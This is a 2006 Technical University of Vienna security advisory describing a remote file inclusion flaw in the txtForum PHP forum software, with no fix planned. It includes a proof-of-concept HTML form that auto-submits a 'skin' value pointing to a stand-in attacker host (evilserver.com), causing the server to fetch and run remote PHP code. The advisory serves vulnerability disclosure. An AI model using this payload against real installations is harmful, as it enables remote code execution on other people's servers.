=========================================================== txtForum: Script Injection Vulnerability =========================================================== Technical University of Vienna Security Advisory TUVSA-0603-004, March 9, 2006 =========================================================== Affected applications ---------------------- txtForum (http://sourceforge.net/projects/txtforum1) Versions 1.0.4-dev and prior. Description ------------ There is an include statement in the file common.php on line 46 that makes use of the SKIN constant, which was previously defined via the $skin variable. Under the following conditions, an attacker can inject arbitrary PHP script into the application: - register_globals has to be active - remote file inclusions have to be allowed All the attacker has to do is find a path through the program that doesn't initialize the $skin variable. The attacker does not require access to an account in the forum. Here is an example for an attack page: <form action='http://localhost/txtforum104/login.php' method="post"> <input type="text" name="login_username" value="admin"/> <input type="text" name="login_password" value="xyz"/> <input type="text" name="skin" value="http://evilserver.com"/> <input type="submit"> </form> <script type="text/javascript"> document.forms[0].submit(); </script> This leads to execution of the code in http://evilserver.com/header.tpl. There might be further possibilities for exploits (similar include statements can also be found on lines 53 and 61). Solution --------- There is no solution to this issue yet. Timeline: March 2, 2006: Vulnerability reported to and acknowledged by the developer (I.Konforti). A fix is not planned. March 9, 2006: Advisory submission. References ----------- http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt Nenad Jovanovic Secure Systems Lab Technical University of Vienna www.seclab.tuwien.ac.at
